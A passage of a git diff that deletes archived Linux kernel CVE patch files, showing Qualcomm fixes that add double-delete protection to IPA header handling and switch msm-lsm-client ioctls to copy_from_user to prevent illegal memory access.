- 		htbl->proc_ctx_cnt, entry->offset_entry->offset);
- 
-+	if (by_user && entry->user_deleted) {
-+		IPAERR("proc_ctx already deleted by user\n");
-+		return -EINVAL;
-+	}
-+
-+	if (by_user)
-+		entry->user_deleted = true;
-+
- 	if (--entry->ref_cnt) {
- 		IPADBG("proc_ctx_hdl %x ref_cnt %d\n",
- 			proc_ctx_hdl, entry->ref_cnt);
-@@ -597,7 +606,7 @@ static int __ipa3_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr)
- 	}
- 
- 	if (release_hdr)
--		__ipa3_del_hdr(entry->hdr->id);
-+		__ipa3_del_hdr(entry->hdr->id, false);
- 
- 	/* move the offset entry to appropriate free list */
- 	list_move(&entry->offset_entry->link,
-@@ -614,7 +623,7 @@ static int __ipa3_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr)
- }
- 
- 
--int __ipa3_del_hdr(u32 hdr_hdl)
-+int __ipa3_del_hdr(u32 hdr_hdl, bool by_user)
- {
- 	struct ipa3_hdr_entry *entry;
- 	struct ipa3_hdr_tbl *htbl = &ipa3_ctx->hdr_tbl;
-@@ -625,7 +634,7 @@ int __ipa3_del_hdr(u32 hdr_hdl)
- 		return -EINVAL;
- 	}
- 
--	if (!entry || (entry->cookie != IPA_COOKIE)) {
-+	if (entry->cookie != IPA_COOKIE) {
- 		IPAERR("bad parm\n");
- 		return -EINVAL;
- 	}
-@@ -638,6 +647,14 @@ int __ipa3_del_hdr(u32 hdr_hdl)
- 			entry->hdr_len, htbl->hdr_cnt,
- 			entry->offset_entry->offset);
- 
-+	if (by_user && entry->user_deleted) {
-+		IPAERR("proc_ctx already deleted by user\n");
-+		return -EINVAL;
-+	}
-+
-+	if (by_user)
-+		entry->user_deleted = true;
-+
- 	if (--entry->ref_cnt) {
- 		IPADBG("hdr_hdl %x ref_cnt %d\n", hdr_hdl, entry->ref_cnt);
- 		return 0;
-@@ -648,7 +665,7 @@ int __ipa3_del_hdr(u32 hdr_hdl)
- 			entry->phys_base,
- 			entry->hdr_len,
- 			DMA_TO_DEVICE);
--		__ipa3_del_hdr_proc_ctx(entry->proc_ctx->id, false);
-+		__ipa3_del_hdr_proc_ctx(entry->proc_ctx->id, false, false);
- 	} else {
- 		/* move the offset entry to appropriate free list */
- 		list_move(&entry->offset_entry->link,
-@@ -710,15 +727,16 @@ bail:
- }
- 
- /**
-- * ipa3_del_hdr() - Remove the specified headers from SW and optionally commit them
-- * to IPA HW
-+ * ipa3_del_hdr_by_user() - Remove the specified headers
-+ * from SW and optionally commit them to IPA HW
-  * @hdls:	[inout] set of headers to delete
-+ * @by_user:	Operation requested by user?
-  *
-  * Returns:	0 on success, negative on failure
-  *
-  * Note:	Should not be called from atomic context
-  */
--int ipa3_del_hdr(struct ipa_ioc_del_hdr *hdls)
-+int ipa3_del_hdr_by_user(struct ipa_ioc_del_hdr *hdls, bool by_user)
- {
- 	int i;
- 	int result = -EFAULT;
-@@ -730,7 +748,7 @@ int ipa3_del_hdr(struct ipa_ioc_del_hdr *hdls)
- 
- 	mutex_lock(&ipa3_ctx->lock);
- 	for (i = 0; i < hdls->num_hdls; i++) {
--		if (__ipa3_del_hdr(hdls->hdl[i].hdl)) {
-+		if (__ipa3_del_hdr(hdls->hdl[i].hdl, by_user)) {
- 			IPAERR("failed to del hdr %i\n", i);
- 			hdls->hdl[i].status = -1;
- 		} else {
-@@ -751,6 +769,20 @@ bail:
- }
- 
- /**
-+ * ipa3_del_hdr() - Remove the specified headers from SW
-+ * and optionally commit them to IPA HW
-+ * @hdls:	[inout] set of headers to delete
-+ *
-+ * Returns:	0 on success, negative on failure
-+ *
-+ * Note:	Should not be called from atomic context
-+ */
-+int ipa3_del_hdr(struct ipa_ioc_del_hdr *hdls)
-+{
-+	return ipa3_del_hdr_by_user(hdls, false);
-+}
-+
-+/**
-  * ipa3_add_hdr_proc_ctx() - add the specified headers to SW
-  * and optionally commit them to IPA HW
-  * @proc_ctxs:	[inout] set of processing context headers to add
-@@ -795,16 +827,18 @@ bail:
- }
- 
- /**
-- * ipa3_del_hdr_proc_ctx() -
-+ * ipa3_del_hdr_proc_ctx_by_user() -
-  * Remove the specified processing context headers from SW and
-  * optionally commit them to IPA HW.
-  * @hdls:	[inout] set of processing context headers to delete
-+ * @by_user:	Operation requested by user?
-  *
-  * Returns:	0 on success, negative on failure
-  *
-  * Note:	Should not be called from atomic context
-  */
--int ipa3_del_hdr_proc_ctx(struct ipa_ioc_del_hdr_proc_ctx *hdls)
-+int ipa3_del_hdr_proc_ctx_by_user(struct ipa_ioc_del_hdr_proc_ctx *hdls,
-+	bool by_user)
- {
- 	int i;
- 	int result;
-@@ -816,7 +850,7 @@ int ipa3_del_hdr_proc_ctx(struct ipa_ioc_del_hdr_proc_ctx *hdls)
- 
- 	mutex_lock(&ipa3_ctx->lock);
- 	for (i = 0; i < hdls->num_hdls; i++) {
--		if (__ipa3_del_hdr_proc_ctx(hdls->hdl[i].hdl, true)) {
-+		if (__ipa3_del_hdr_proc_ctx(hdls->hdl[i].hdl, true, by_user)) {
- 			IPAERR("failed to del hdr %i\n", i);
- 			hdls->hdl[i].status = -1;
- 		} else {
-@@ -837,6 +871,21 @@ bail:
- }
- 
- /**
-+ * ipa3_del_hdr_proc_ctx() -
-+ * Remove the specified processing context headers from SW and
-+ * optionally commit them to IPA HW.
-+ * @hdls:	[inout] set of processing context headers to delete
-+ *
-+ * Returns:	0 on success, negative on failure
-+ *
-+ * Note:	Should not be called from atomic context
-+ */
-+int ipa3_del_hdr_proc_ctx(struct ipa_ioc_del_hdr_proc_ctx *hdls)
-+{
-+	return ipa3_del_hdr_proc_ctx_by_user(hdls, false);
-+}
-+
-+/**
-  * ipa3_commit_hdr() - commit to IPA HW the current header table in SW
-  *
-  * Returns:	0 on success, negative on failure
-@@ -1064,7 +1113,7 @@ int __ipa3_release_hdr(u32 hdr_hdl)
- {
- 	int result = 0;
- 
--	if (__ipa3_del_hdr(hdr_hdl)) {
-+	if (__ipa3_del_hdr(hdr_hdl, false)) {
- 		IPADBG("fail to del hdr %x\n", hdr_hdl);
- 		result = -EFAULT;
- 		goto bail;
-@@ -1092,7 +1141,7 @@ int __ipa3_release_hdr_proc_ctx(u32 proc_ctx_hdl)
- {
- 	int result = 0;
- 
--	if (__ipa3_del_hdr_proc_ctx(proc_ctx_hdl, true)) {
-+	if (__ipa3_del_hdr_proc_ctx(proc_ctx_hdl, true, false)) {
- 		IPADBG("fail to del hdr %x\n", proc_ctx_hdl);
- 		result = -EFAULT;
- 		goto bail;
-diff --git a/drivers/platform/msm/ipa/ipa_v3/ipa_i.h b/drivers/platform/msm/ipa/ipa_v3/ipa_i.h
-index fe7c88a..b3ce524 100644
---- a/drivers/platform/msm/ipa/ipa_v3/ipa_i.h
-+++ b/drivers/platform/msm/ipa/ipa_v3/ipa_i.h
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -279,6 +279,7 @@ struct ipa3_rt_tbl {
-  * @id: header entry id
-  * @is_eth2_ofst_valid: is eth2_ofst field valid?
-  * @eth2_ofst: offset to start of Ethernet-II/802.3 header
-+ * @user_deleted: is the header deleted by the user?
-  */
- struct ipa3_hdr_entry {
- 	struct list_head link;
-@@ -296,6 +297,7 @@ struct ipa3_hdr_entry {
- 	int id;
- 	u8 is_eth2_ofst_valid;
- 	u16 eth2_ofst;
-+	bool user_deleted;
- };
- 
- /**
-@@ -335,6 +337,7 @@ struct ipa3_hdr_proc_ctx_offset_entry {
-  * @cookie: cookie used for validity check
-  * @ref_cnt: reference counter of routing table
-  * @id: processing context header entry id
-+ * @user_deleted: is the hdr processing context deleted by the user?
-  */
- struct ipa3_hdr_proc_ctx_entry {
- 	struct list_head link;
-@@ -344,6 +347,7 @@ struct ipa3_hdr_proc_ctx_entry {
- 	u32 cookie;
- 	u32 ref_cnt;
- 	int id;
-+	bool user_deleted;
- };
- 
- /**
-@@ -1548,6 +1552,8 @@ int ipa3_add_hdr(struct ipa_ioc_add_hdr *hdrs);
- 
- int ipa3_del_hdr(struct ipa_ioc_del_hdr *hdls);
- 
-+int ipa3_del_hdr_by_user(struct ipa_ioc_del_hdr *hdls, bool by_user);
-+
- int ipa3_commit_hdr(void);
- 
- int ipa3_reset_hdr(void);
-@@ -1565,6 +1571,9 @@ int ipa3_add_hdr_proc_ctx(struct ipa_ioc_add_hdr_proc_ctx *proc_ctxs);
- 
- int ipa3_del_hdr_proc_ctx(struct ipa_ioc_del_hdr_proc_ctx *hdls);
- 
-+int ipa3_del_hdr_proc_ctx_by_user(struct ipa_ioc_del_hdr_proc_ctx *hdls,
-+	bool by_user);
-+
- /*
-  * Routing
-  */
-@@ -1869,7 +1878,7 @@ int ipa3_active_clients_log_print_table(char *buf, int size);
- void ipa3_active_clients_log_clear(void);
- int ipa3_interrupts_init(u32 ipa_irq, u32 ee, struct device *ipa_dev);
- int __ipa3_del_rt_rule(u32 rule_hdl);
--int __ipa3_del_hdr(u32 hdr_hdl);
-+int __ipa3_del_hdr(u32 hdr_hdl, bool by_user);
- int __ipa3_release_hdr(u32 hdr_hdl);
- int __ipa3_release_hdr_proc_ctx(u32 proc_ctx_hdl);
- int _ipa_read_ep_reg_v3_0(char *buf, int max_len, int pipe);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0531/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-0531/3.18/0001.patch
deleted file mode 100644
index 8c9dd352..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0531/3.18/0001.patch
+++ /dev/null
@@ -1,275 +0,0 @@
-From 530f3a0fd837ed105eddaf99810bc13d97dc4302 Mon Sep 17 00:00:00 2001
-From: Bhalchandra Gajare <gajare@codeaurora.org>
-Date: Thu, 15 Dec 2016 16:43:45 -0800
-Subject: ASoC: msm-lsm-client: cleanup ioctl functions
-
-Some of the ioctl command handling is not properly using the
-copy_from_user interface. Fix these issues and cleanup the ioctl
-functions to make sure there is no illegal memory access.
-
-CRs-Fixed: 1087469
-Change-Id: Ieb1beb92e7854a05b8045de0ce179d12c9a6da74
-Signed-off-by: Bhalchandra Gajare <gajare@codeaurora.org>
----
- sound/soc/msm/qdsp6v2/msm-lsm-client.c | 131 ++++++++++-----------------------
- 1 file changed, 40 insertions(+), 91 deletions(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-lsm-client.c b/sound/soc/msm/qdsp6v2/msm-lsm-client.c
-index 32a16bf..c365220 100644
---- a/sound/soc/msm/qdsp6v2/msm-lsm-client.c
-+++ b/sound/soc/msm/qdsp6v2/msm-lsm-client.c
-@@ -727,8 +727,13 @@ static int msm_lsm_ioctl_shared(struct snd_pcm_substream *substream,
- 	switch (cmd) {
- 	case SNDRV_LSM_SET_SESSION_DATA:
- 		dev_dbg(rtd->dev, "%s: set session data\n", __func__);
--		memcpy(&session_data, arg,
--		       sizeof(struct snd_lsm_session_data));
-+		if (copy_from_user(&session_data, arg,
-+				   sizeof(session_data))) {
-+			dev_err(rtd->dev, "%s: %s: copy_from_user failed\n",
-+				__func__, "LSM_SET_SESSION_DATA");
-+			return -EFAULT;
-+		}
-+
- 		if (session_data.app_id != LSM_VOICE_WAKEUP_APP_ID_V2) {
- 			dev_err(rtd->dev,
- 				"%s:Invalid App id %d for Listen client\n",
-@@ -817,13 +822,6 @@ static int msm_lsm_ioctl_shared(struct snd_pcm_substream *substream,
- 		break;
- 
- 	case SNDRV_LSM_SET_PARAMS:
--		if (!arg) {
--			dev_err(rtd->dev,
--				"%s: %s Invalid argument\n",
--				__func__, "SNDRV_LSM_SET_PARAMS");
--			return -EINVAL;
--		}
--
- 		dev_dbg(rtd->dev, "%s: set_params\n", __func__);
- 		memcpy(&det_params, arg,
- 			sizeof(det_params));
-@@ -975,45 +973,43 @@ static int msm_lsm_ioctl_shared(struct snd_pcm_substream *substream,
- 		break;
- 	}
- 	case SNDRV_LSM_LAB_CONTROL: {
--		u32 *enable = NULL;
--		if (!arg) {
--			dev_err(rtd->dev,
--				"%s: Invalid param arg for ioctl %s session %d\n",
--				__func__, "SNDRV_LSM_LAB_CONTROL",
--				prtd->lsm_client->session);
--			rc = -EINVAL;
--			break;
-+		u32 enable;
-+
-+		if (copy_from_user(&enable, arg, sizeof(enable))) {
-+			dev_err(rtd->dev, "%s: %s: copy_frm_user failed\n",
-+				__func__, "LSM_LAB_CONTROL");
-+			return -EFAULT;
- 		}
--		enable = (int *)arg;
-+
- 		dev_dbg(rtd->dev, "%s: ioctl %s, enable = %d\n",
--			 __func__, "SNDRV_LSM_LAB_CONTROL", *enable);
-+			 __func__, "SNDRV_LSM_LAB_CONTROL", enable);
- 		if (!prtd->lsm_client->started) {
--			if (prtd->lsm_client->lab_enable == *enable) {
-+			if (prtd->lsm_client->lab_enable == enable) {
- 				dev_dbg(rtd->dev,
- 					"%s: Lab for session %d already %s\n",
- 					__func__, prtd->lsm_client->session,
--					((*enable) ? "enabled" : "disabled"));
-+					enable ? "enabled" : "disabled");
- 				rc = 0;
- 				break;
- 			}
--			rc = q6lsm_lab_control(prtd->lsm_client, *enable);
-+			rc = q6lsm_lab_control(prtd->lsm_client, enable);
- 			if (rc) {
- 				dev_err(rtd->dev,
- 					"%s: ioctl %s failed rc %d to %s lab for session %d\n",
- 					__func__, "SNDRV_LAB_CONTROL", rc,
--					((*enable) ? "enable" : "disable"),
-+					enable ? "enable" : "disable",
- 					prtd->lsm_client->session);
- 			} else {
- 				rc = msm_lsm_lab_buffer_alloc(prtd,
--					((*enable) ? LAB_BUFFER_ALLOC
--					: LAB_BUFFER_DEALLOC));
-+					enable ? LAB_BUFFER_ALLOC
-+					: LAB_BUFFER_DEALLOC);
- 				if (rc)
- 					dev_err(rtd->dev,
- 						"%s: msm_lsm_lab_buffer_alloc failed rc %d for %s",
- 						__func__, rc,
--					((*enable) ? "ALLOC" : "DEALLOC"));
-+						enable ? "ALLOC" : "DEALLOC");
- 				if (!rc)
--					prtd->lsm_client->lab_enable = *enable;
-+					prtd->lsm_client->lab_enable = enable;
- 			}
- 		} else {
- 			dev_err(rtd->dev, "%s: ioctl %s issued after start",
-@@ -1060,12 +1056,6 @@ static int msm_lsm_ioctl_shared(struct snd_pcm_substream *substream,
- 	return rc;
- }
- #ifdef CONFIG_COMPAT
--struct snd_lsm_event_status32 {
--	u16 status;
--	u16 payload_size;
--	u8 payload[0];
--};
--
- struct snd_lsm_sound_model_v2_32 {
- 	compat_uptr_t data;
- 	compat_uptr_t confidence_level;
-@@ -1097,8 +1087,6 @@ struct snd_lsm_module_params_32 {
- };
- 
- enum {
--	SNDRV_LSM_EVENT_STATUS32 =
--		_IOW('U', 0x02, struct snd_lsm_event_status32),
- 	SNDRV_LSM_REG_SND_MODEL_V2_32 =
- 		_IOW('U', 0x07, struct snd_lsm_sound_model_v2_32),
- 	SNDRV_LSM_SET_PARAMS_32 =
-@@ -1129,12 +1117,12 @@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream,
- 	prtd = runtime->private_data;
- 
- 	switch (cmd) {
--	case SNDRV_LSM_EVENT_STATUS32: {
--		struct snd_lsm_event_status32 userarg32, *user32 = NULL;
--		struct snd_lsm_event_status *user = NULL;
-+	case SNDRV_LSM_EVENT_STATUS: {
-+		struct snd_lsm_event_status *user = NULL, userarg32;
-+		struct snd_lsm_event_status *user32 = NULL;
- 		if (copy_from_user(&userarg32, arg, sizeof(userarg32))) {
- 			dev_err(rtd->dev, "%s: err copyuser ioctl %s\n",
--				__func__, "SNDRV_LSM_EVENT_STATUS32");
-+				__func__, "SNDRV_LSM_EVENT_STATUS");
- 			return -EFAULT;
- 		}
- 
-@@ -1288,13 +1276,6 @@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream,
- 			return -EINVAL;
- 		}
- 
--		if (!arg) {
--			dev_err(rtd->dev,
--				"%s: %s: No Param data to set\n",
--				__func__, "SET_MODULE_PARAMS_32");
--			return -EINVAL;
--		}
--
- 		if (copy_from_user(&p_data_32, arg,
- 				   sizeof(p_data_32))) {
- 			dev_err(rtd->dev,
-@@ -1379,6 +1360,19 @@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream,
- 		kfree(params32);
- 		break;
- 	}
-+	case SNDRV_LSM_REG_SND_MODEL_V2:
-+	case SNDRV_LSM_SET_PARAMS:
-+	case SNDRV_LSM_SET_MODULE_PARAMS:
-+		/*
-+		 * In ideal cases, the compat_ioctl should never be called
-+		 * with the above unlocked ioctl commands. Print error
-+		 * and return error if it does.
-+		 */
-+		dev_err(rtd->dev,
-+			"%s: Invalid cmd for compat_ioctl\n",
-+			__func__);
-+		err = -EINVAL;
-+		break;
- 	default:
- 		err = msm_lsm_ioctl_shared(substream, cmd, arg);
- 		break;
-@@ -1394,7 +1388,6 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- {
- 	int err = 0;
- 	u32 size = 0;
--	struct snd_lsm_session_data session_data;
- 	struct snd_pcm_runtime *runtime;
- 	struct snd_soc_pcm_runtime *rtd;
- 	struct lsm_priv *prtd;
-@@ -1409,26 +1402,6 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- 	rtd = substream->private_data;
- 
- 	switch (cmd) {
--	case SNDRV_LSM_SET_SESSION_DATA:
--		dev_dbg(rtd->dev,
--			"%s: SNDRV_LSM_SET_SESSION_DATA\n",
--			__func__);
--		if (copy_from_user(&session_data, (void *)arg,
--				   sizeof(struct snd_lsm_session_data))) {
--			err = -EFAULT;
--			dev_err(rtd->dev,
--				"%s: copy from user failed, size %zd\n",
--				__func__, sizeof(struct snd_lsm_session_data));
--			break;
--		}
--		if (!err)
--			err = msm_lsm_ioctl_shared(substream,
--						   cmd, &session_data);
--		if (err)
--			dev_err(rtd->dev,
--				"%s REG_SND_MODEL failed err %d\n",
--				__func__, err);
--		break;
- 	case SNDRV_LSM_REG_SND_MODEL_V2: {
- 		struct snd_lsm_sound_model_v2 snd_model_v2;
- 
-@@ -1439,11 +1412,6 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- 			return -EINVAL;
- 		}
- 
--		if (!arg) {
--			dev_err(rtd->dev,
--				"%s: Invalid params snd_model\n", __func__);
--			return -EINVAL;
--		}
- 		if (copy_from_user(&snd_model_v2, arg, sizeof(snd_model_v2))) {
- 			err = -EFAULT;
- 			dev_err(rtd->dev,
-@@ -1472,12 +1440,6 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- 		}
- 
- 		pr_debug("%s: SNDRV_LSM_SET_PARAMS\n", __func__);
--		if (!arg) {
--			dev_err(rtd->dev,
--				"%s: %s, Invalid params\n",
--				__func__, "SNDRV_LSM_SET_PARAMS");
--			return -EINVAL;
--		}
- 
- 		if (copy_from_user(&det_params, arg,
- 				   sizeof(det_params))) {
-@@ -1510,13 +1472,6 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- 			return -EINVAL;
- 		}
- 
--		if (!arg) {
--			dev_err(rtd->dev,
--				"%s: %s: No Param data to set\n",
--				__func__, "SET_MODULE_PARAMS");
--			return -EINVAL;
--		}
--
- 		if (copy_from_user(&p_data, arg,
- 				   sizeof(p_data))) {
- 			dev_err(rtd->dev,
-@@ -1574,12 +1529,6 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- 		struct snd_lsm_event_status *user = NULL, userarg;
- 		dev_dbg(rtd->dev,
- 			"%s: SNDRV_LSM_EVENT_STATUS\n", __func__);
--		if (!arg) {
--			dev_err(rtd->dev,
--				"%s: Invalid params event status\n",
--				__func__);
--			return -EINVAL;
--		}
- 		if (copy_from_user(&userarg, arg, sizeof(userarg))) {
- 			dev_err(rtd->dev,
- 				"%s: err copyuser event_status\n",
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0531/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-0531/4.4/0002.patch
deleted file mode 100644
index c2daf375..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0531/4.4/0002.patch
+++ /dev/null
@@ -1,275 +0,0 @@
-From d342da7d820af9c7c0b0b8049adb53beb713e0f0 Mon Sep 17 00:00:00 2001
-From: Bhalchandra Gajare <gajare@codeaurora.org>
-Date: Thu, 15 Dec 2016 16:43:45 -0800
-Subject: ASoC: msm-lsm-client: cleanup ioctl functions
-
-Some of the ioctl command handling is not properly using the
-copy_from_user interface. Fix these issues and cleanup the ioctl
-functions to make sure there is no illegal memory access.
-
-CRs-Fixed: 1087469
-Change-Id: Ieb1beb92e7854a05b8045de0ce179d12c9a6da74
-Signed-off-by: Bhalchandra Gajare <gajare@codeaurora.org>
----
- sound/soc/msm/qdsp6v2/msm-lsm-client.c | 131 ++++++++++-----------------------
- 1 file changed, 40 insertions(+), 91 deletions(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-lsm-client.c b/sound/soc/msm/qdsp6v2/msm-lsm-client.c
-index 52830c9..efb6644e 100644
---- a/sound/soc/msm/qdsp6v2/msm-lsm-client.c
-+++ b/sound/soc/msm/qdsp6v2/msm-lsm-client.c
-@@ -730,8 +730,13 @@ static int msm_lsm_ioctl_shared(struct snd_pcm_substream *substream,
- 	switch (cmd) {
- 	case SNDRV_LSM_SET_SESSION_DATA:
- 		dev_dbg(rtd->dev, "%s: set session data\n", __func__);
--		memcpy(&session_data, arg,
--		       sizeof(struct snd_lsm_session_data));
-+		if (copy_from_user(&session_data, arg,
-+				   sizeof(session_data))) {
-+			dev_err(rtd->dev, "%s: %s: copy_from_user failed\n",
-+				__func__, "LSM_SET_SESSION_DATA");
-+			return -EFAULT;
-+		}
-+
- 		if (session_data.app_id != LSM_VOICE_WAKEUP_APP_ID_V2) {
- 			dev_err(rtd->dev,
- 				"%s:Invalid App id %d for Listen client\n",
-@@ -820,13 +825,6 @@ static int msm_lsm_ioctl_shared(struct snd_pcm_substream *substream,
- 		break;
- 
- 	case SNDRV_LSM_SET_PARAMS:
--		if (!arg) {
--			dev_err(rtd->dev,
--				"%s: %s Invalid argument\n",
--				__func__, "SNDRV_LSM_SET_PARAMS");
--			return -EINVAL;
--		}
--
- 		dev_dbg(rtd->dev, "%s: set_params\n", __func__);
- 		memcpy(&det_params, arg,
- 			sizeof(det_params));
-@@ -978,45 +976,43 @@ static int msm_lsm_ioctl_shared(struct snd_pcm_substream *substream,
- 		break;
- 	}
- 	case SNDRV_LSM_LAB_CONTROL: {
--		u32 *enable = NULL;
--		if (!arg) {
--			dev_err(rtd->dev,
--				"%s: Invalid param arg for ioctl %s session %d\n",
--				__func__, "SNDRV_LSM_LAB_CONTROL",
--				prtd->lsm_client->session);
--			rc = -EINVAL;
--			break;
-+		u32 enable;
-+
-+		if (copy_from_user(&enable, arg, sizeof(enable))) {
-+			dev_err(rtd->dev, "%s: %s: copy_frm_user failed\n",
-+				__func__, "LSM_LAB_CONTROL");
-+			return -EFAULT;
- 		}
--		enable = (int *)arg;
-+
- 		dev_dbg(rtd->dev, "%s: ioctl %s, enable = %d\n",
--			 __func__, "SNDRV_LSM_LAB_CONTROL", *enable);
-+			 __func__, "SNDRV_LSM_LAB_CONTROL", enable);
- 		if (!prtd->lsm_client->started) {
--			if (prtd->lsm_client->lab_enable == *enable) {
-+			if (prtd->lsm_client->lab_enable == enable) {
- 				dev_dbg(rtd->dev,
- 					"%s: Lab for session %d already %s\n",
- 					__func__, prtd->lsm_client->session,
--					((*enable) ? "enabled" : "disabled"));
-+					enable ? "enabled" : "disabled");
- 				rc = 0;
- 				break;
- 			}
--			rc = q6lsm_lab_control(prtd->lsm_client, *enable);
-+			rc = q6lsm_lab_control(prtd->lsm_client, enable);
- 			if (rc) {
- 				dev_err(rtd->dev,
- 					"%s: ioctl %s failed rc %d to %s lab for session %d\n",
- 					__func__, "SNDRV_LAB_CONTROL", rc,
--					((*enable) ? "enable" : "disable"),
-+					enable ? "enable" : "disable",
- 					prtd->lsm_client->session);
- 			} else {
- 				rc = msm_lsm_lab_buffer_alloc(prtd,
--					((*enable) ? LAB_BUFFER_ALLOC
--					: LAB_BUFFER_DEALLOC));
-+					enable ? LAB_BUFFER_ALLOC
-+					: LAB_BUFFER_DEALLOC);
- 				if (rc)
- 					dev_err(rtd->dev,
- 						"%s: msm_lsm_lab_buffer_alloc failed rc %d for %s",
- 						__func__, rc,
--					((*enable) ? "ALLOC" : "DEALLOC"));
-+						enable ? "ALLOC" : "DEALLOC");
- 				if (!rc)
--					prtd->lsm_client->lab_enable = *enable;
-+					prtd->lsm_client->lab_enable = enable;
- 			}
- 		} else {
- 			dev_err(rtd->dev, "%s: ioctl %s issued after start",
-@@ -1057,12 +1053,6 @@ static int msm_lsm_ioctl_shared(struct snd_pcm_substream *substream,
- 	return rc;
- }
- #ifdef CONFIG_COMPAT
--struct snd_lsm_event_status32 {
--	u16 status;
--	u16 payload_size;
--	u8 payload[0];
--};
--
- struct snd_lsm_sound_model_v2_32 {
- 	compat_uptr_t data;
- 	compat_uptr_t confidence_level;
-@@ -1094,8 +1084,6 @@ struct snd_lsm_module_params_32 {
- };
- 
- enum {
--	SNDRV_LSM_EVENT_STATUS32 =
--		_IOW('U', 0x02, struct snd_lsm_event_status32),
- 	SNDRV_LSM_REG_SND_MODEL_V2_32 =
- 		_IOW('U', 0x07, struct snd_lsm_sound_model_v2_32),
- 	SNDRV_LSM_SET_PARAMS_32 =
-@@ -1126,12 +1114,12 @@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream,
- 	prtd = runtime->private_data;
- 
- 	switch (cmd) {
--	case SNDRV_LSM_EVENT_STATUS32: {
--		struct snd_lsm_event_status32 userarg32, *user32 = NULL;
--		struct snd_lsm_event_status *user = NULL;
-+	case SNDRV_LSM_EVENT_STATUS: {
-+		struct snd_lsm_event_status *user = NULL, userarg32;
-+		struct snd_lsm_event_status *user32 = NULL;
- 		if (copy_from_user(&userarg32, arg, sizeof(userarg32))) {
- 			dev_err(rtd->dev, "%s: err copyuser ioctl %s\n",
--				__func__, "SNDRV_LSM_EVENT_STATUS32");
-+				__func__, "SNDRV_LSM_EVENT_STATUS");
- 			return -EFAULT;
- 		}
- 
-@@ -1285,13 +1273,6 @@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream,
- 			return -EINVAL;
- 		}
- 
--		if (!arg) {
--			dev_err(rtd->dev,
--				"%s: %s: No Param data to set\n",
--				__func__, "SET_MODULE_PARAMS_32");
--			return -EINVAL;
--		}
--
- 		if (copy_from_user(&p_data_32, arg,
- 				   sizeof(p_data_32))) {
- 			dev_err(rtd->dev,
-@@ -1376,6 +1357,19 @@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream,
- 		kfree(params32);
- 		break;
- 	}
-+	case SNDRV_LSM_REG_SND_MODEL_V2:
-+	case SNDRV_LSM_SET_PARAMS:
-+	case SNDRV_LSM_SET_MODULE_PARAMS:
-+		/*
-+		 * In ideal cases, the compat_ioctl should never be called
-+		 * with the above unlocked ioctl commands. Print error
-+		 * and return error if it does.
-+		 */
-+		dev_err(rtd->dev,
-+			"%s: Invalid cmd for compat_ioctl\n",
-+			__func__);
-+		err = -EINVAL;
-+		break;
- 	default:
- 		err = msm_lsm_ioctl_shared(substream, cmd, arg);
- 		break;
-@@ -1391,7 +1385,6 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- {
- 	int err = 0;
- 	u32 size = 0;
--	struct snd_lsm_session_data session_data;
- 	struct snd_pcm_runtime *runtime;
- 	struct snd_soc_pcm_runtime *rtd;
- 	struct lsm_priv *prtd;
-@@ -1406,26 +1399,6 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- 	rtd = substream->private_data;
- 
- 	switch (cmd) {
--	case SNDRV_LSM_SET_SESSION_DATA:
--		dev_dbg(rtd->dev,
--			"%s: SNDRV_LSM_SET_SESSION_DATA\n",
--			__func__);
--		if (copy_from_user(&session_data, (void *)arg,
--				   sizeof(struct snd_lsm_session_data))) {
--			err = -EFAULT;
--			dev_err(rtd->dev,
--				"%s: copy from user failed, size %zd\n",
--				__func__, sizeof(struct snd_lsm_session_data));
--			break;
--		}
--		if (!err)
--			err = msm_lsm_ioctl_shared(substream,
--						   cmd, &session_data);
--		if (err)
--			dev_err(rtd->dev,
--				"%s REG_SND_MODEL failed err %d\n",
--				__func__, err);
--		break;
- 	case SNDRV_LSM_REG_SND_MODEL_V2: {
- 		struct snd_lsm_sound_model_v2 snd_model_v2;
- 
-@@ -1436,11 +1409,6 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- 			return -EINVAL;
- 		}
- 
--		if (!arg) {
--			dev_err(rtd->dev,
--				"%s: Invalid params snd_model\n", __func__);
--			return -EINVAL;
--		}
- 		if (copy_from_user(&snd_model_v2, arg, sizeof(snd_model_v2))) {
- 			err = -EFAULT;
- 			dev_err(rtd->dev,
-@@ -1469,12 +1437,6 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- 		}
- 
- 		pr_debug("%s: SNDRV_LSM_SET_PARAMS\n", __func__);
--		if (!arg) {
--			dev_err(rtd->dev,
--				"%s: %s, Invalid params\n",
--				__func__, "SNDRV_LSM_SET_PARAMS");
--			return -EINVAL;
--		}
- 
- 		if (copy_from_user(&det_params, arg,
- 				   sizeof(det_params))) {
-@@ -1507,13 +1469,6 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- 			return -EINVAL;
- 		}
- 
--		if (!arg) {
--			dev_err(rtd->dev,
--				"%s: %s: No Param data to set\n",
